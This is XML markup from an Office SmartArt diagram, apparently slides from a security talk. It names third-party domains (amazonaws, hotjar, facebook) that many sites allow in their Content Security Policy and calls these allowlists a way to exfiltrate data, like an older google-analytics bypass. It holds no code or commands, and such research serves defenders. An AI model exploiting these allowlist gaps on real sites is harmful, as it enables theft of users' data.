      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleY="145364"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88F358FB-2408-41AF-A257-5964FED42C08}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5630021E-01C2-4224-B2FD-13882086D125}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" srcOrd="0" destOrd="0" parTransId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" sibTransId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}"/>
    <dgm:cxn modelId="{4A4E020C-A450-4703-8F9E-BEAEAA44A6DF}" type="presOf" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{95643A34-3925-496D-828E-03EE978991E4}" type="presOf" srcId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F1768B82-27A8-42E6-B9EE-B515186008BE}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" srcOrd="1" destOrd="0" parTransId="{FE15717C-0244-4042-8917-61342E9C39EB}" sibTransId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}"/>
    <dgm:cxn modelId="{6B54A19B-8F83-4143-86E9-66895FFD5B37}" type="presOf" srcId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{09BEC6BA-4684-4792-B590-7374B06F72D8}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" srcOrd="2" destOrd="0" parTransId="{1873F028-2796-4F98-8265-F3360B812BE8}" sibTransId="{84F69CA5-A867-42F3-A080-4906F780782F}"/>
    <dgm:cxn modelId="{07FDB9F3-A009-4B26-A11E-041B398C1E90}" type="presOf" srcId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A320D686-B34F-42E9-A68C-F031782B9AF0}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{706C4974-41C2-4849-856C-FFFC6B58020F}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DE8BAE84-8EE4-471A-9B38-9FF9F225896E}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6DA14C0F-0BEC-4054-9E34-64922B63122C}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{500E4787-A651-49D3-AD50-5657329C998D}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E7553FE7-7BC2-4478-8A8E-F77803516838}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{17797374-B6AF-4211-9102-62BEF26471E3}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{26FEDEF2-992D-4619-8DD4-76B3A9C10F6D}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B58721A7-46F8-403F-8672-C5615A37ACBD}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{88F358FB-2408-41AF-A257-5964FED42C08}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C035B1C-524E-42FE-A7C0-A18E92081B51}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A159EA3F-C548-4124-9CEE-645DB03DAB95}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9C1D5231-FCF3-4E9E-B5D1-D92681DE8FE7}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{5630021E-01C2-4224-B2FD-13882086D12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C77883-98B3-45AA-8230-B250F208076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EFD7051-D69E-47F6-99E8-1DC24B435DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>~550 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" type="parTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}" type="sibTrans" cxnId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" err="1">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: *.amazonaws.com</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE15717C-0244-4042-8917-61342E9C39EB}" type="parTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}" type="sibTrans" cxnId="{F1768B82-27A8-42E6-B9EE-B515186008BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1873F028-2796-4F98-8265-F3360B812BE8}" type="parTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F69CA5-A867-42F3-A080-4906F780782F}" type="sibTrans" cxnId="{09BEC6BA-4684-4792-B590-7374B06F72D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" type="pres">
      <dgm:prSet presAssocID="{09C77883-98B3-45AA-8230-B250F208076F}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" type="pres">
      <dgm:prSet presAssocID="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" type="pres">
      <dgm:prSet presAssocID="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88F358FB-2408-41AF-A257-5964FED42C08}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5630021E-01C2-4224-B2FD-13882086D125}" type="pres">
      <dgm:prSet presAssocID="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7BD6C007-8DFD-4C62-B453-48140D3C0740}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" srcOrd="0" destOrd="0" parTransId="{721DEF2F-F416-41A5-A05F-758F99FDC0C8}" sibTransId="{755D3C55-1B00-43B7-B8A9-19DB61B8AFB8}"/>
    <dgm:cxn modelId="{4A4E020C-A450-4703-8F9E-BEAEAA44A6DF}" type="presOf" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{95643A34-3925-496D-828E-03EE978991E4}" type="presOf" srcId="{7EFD7051-D69E-47F6-99E8-1DC24B435DFC}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F1768B82-27A8-42E6-B9EE-B515186008BE}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" srcOrd="1" destOrd="0" parTransId="{FE15717C-0244-4042-8917-61342E9C39EB}" sibTransId="{56F4FFA3-1D9A-4E57-98E9-5575C45D8158}"/>
    <dgm:cxn modelId="{6B54A19B-8F83-4143-86E9-66895FFD5B37}" type="presOf" srcId="{D8FBAA9B-E53D-4461-9F55-E784903F11C7}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{09BEC6BA-4684-4792-B590-7374B06F72D8}" srcId="{09C77883-98B3-45AA-8230-B250F208076F}" destId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" srcOrd="2" destOrd="0" parTransId="{1873F028-2796-4F98-8265-F3360B812BE8}" sibTransId="{84F69CA5-A867-42F3-A080-4906F780782F}"/>
    <dgm:cxn modelId="{07FDB9F3-A009-4B26-A11E-041B398C1E90}" type="presOf" srcId="{BB4FECA2-5AD7-4B68-9AE2-F741EA57091F}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A320D686-B34F-42E9-A68C-F031782B9AF0}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{D760DC72-46C1-4898-AD8D-16575EA3CD55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{706C4974-41C2-4849-856C-FFFC6B58020F}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DE8BAE84-8EE4-471A-9B38-9FF9F225896E}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{3D4D1DD2-1902-47AC-904F-9723F18DB6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6DA14C0F-0BEC-4054-9E34-64922B63122C}" type="presParOf" srcId="{DC960AB6-70EE-48D0-A814-31914A5EA9EE}" destId="{16FADC84-2696-4969-9978-EE4ACD836C5D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{500E4787-A651-49D3-AD50-5657329C998D}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E7553FE7-7BC2-4478-8A8E-F77803516838}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{17797374-B6AF-4211-9102-62BEF26471E3}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{3602B78D-1E64-41C4-81A9-043B057A6F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{26FEDEF2-992D-4619-8DD4-76B3A9C10F6D}" type="presParOf" srcId="{4F85C694-E1EE-466D-80E1-79C5B39C534B}" destId="{2671FA71-80B5-47F9-86C3-32D2F224EDB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B58721A7-46F8-403F-8672-C5615A37ACBD}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{88F358FB-2408-41AF-A257-5964FED42C08}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C035B1C-524E-42FE-A7C0-A18E92081B51}" type="presParOf" srcId="{DADCE805-475E-4A7E-8CD2-D7BC368789C1}" destId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A159EA3F-C548-4124-9CEE-645DB03DAB95}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{87D9E374-6DBC-4B93-8F23-73523EB7F9DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9C1D5231-FCF3-4E9E-B5D1-D92681DE8FE7}" type="presParOf" srcId="{455DB8E0-D814-44BE-AB12-F0CA173AF294}" destId="{5630021E-01C2-4224-B2FD-13882086D12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0DC72-46C1-4898-AD8D-16575EA3CD55}">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4D1DD2-1902-47AC-904F-9723F18DB6AD}">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GB" sz="3300" kern="1200" dirty="0"/>
            <a:t>~2050 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}">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02B78D-1E64-41C4-81A9-043B057A6F0E}">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GB" sz="3300" kern="1200" dirty="0"/>
            <a:t>Symptoms:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="1466850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="3300" kern="1200" dirty="0" err="1"/>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3300" kern="1200" dirty="0"/>
            <a:t>: *.hotjar.com, ask.hotjar.io</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1384035"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{88F358FB-2408-41AF-A257-5964FED42C08}">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9E374-6DBC-4B93-8F23-73523EB7F9DB}">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GB" sz="3300" kern="1200"/>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2768070"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F01B13FD-4A30-4650-996B-814F40E90546}">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F2ECFB-C125-4897-B28E-5ADDA643D3F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GB" sz="3300" kern="1200"/>
            <a:t>Pretty much like the old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3300" kern="1200">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>www.google-analytics.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3300" kern="1200"/>
            <a:t> bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200"/>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0DC72-46C1-4898-AD8D-16575EA3CD55}">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4D1DD2-1902-47AC-904F-9723F18DB6AD}">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dirty="0"/>
            <a:t>~2750 Sites in my DB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{877B9B36-37C2-42AB-B290-2D5CFBAE4F98}">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02B78D-1E64-41C4-81A9-043B057A6F0E}">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dirty="0"/>
            <a:t>Symptoms: </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" dirty="0" err="1"/>
            <a:t>xxxx-src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" dirty="0"/>
            <a:t>: *.facebook.com, *.facebook.net</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1384035"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{88F358FB-2408-41AF-A257-5964FED42C08}">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9E374-6DBC-4B93-8F23-73523EB7F9DB}">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dirty="0"/>
            <a:t>Can be used to Exfiltrate data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2768070"/>
        <a:ext cx="6900512" cy="1384035"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F01B13FD-4A30-4650-996B-814F40E90546}">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F2ECFB-C125-4897-B28E-5ADDA643D3F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dirty="0"/>
            <a:t>Pretty much like the old </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>www.google-analytics.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" dirty="0"/>
            <a:t> bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4152105"/>
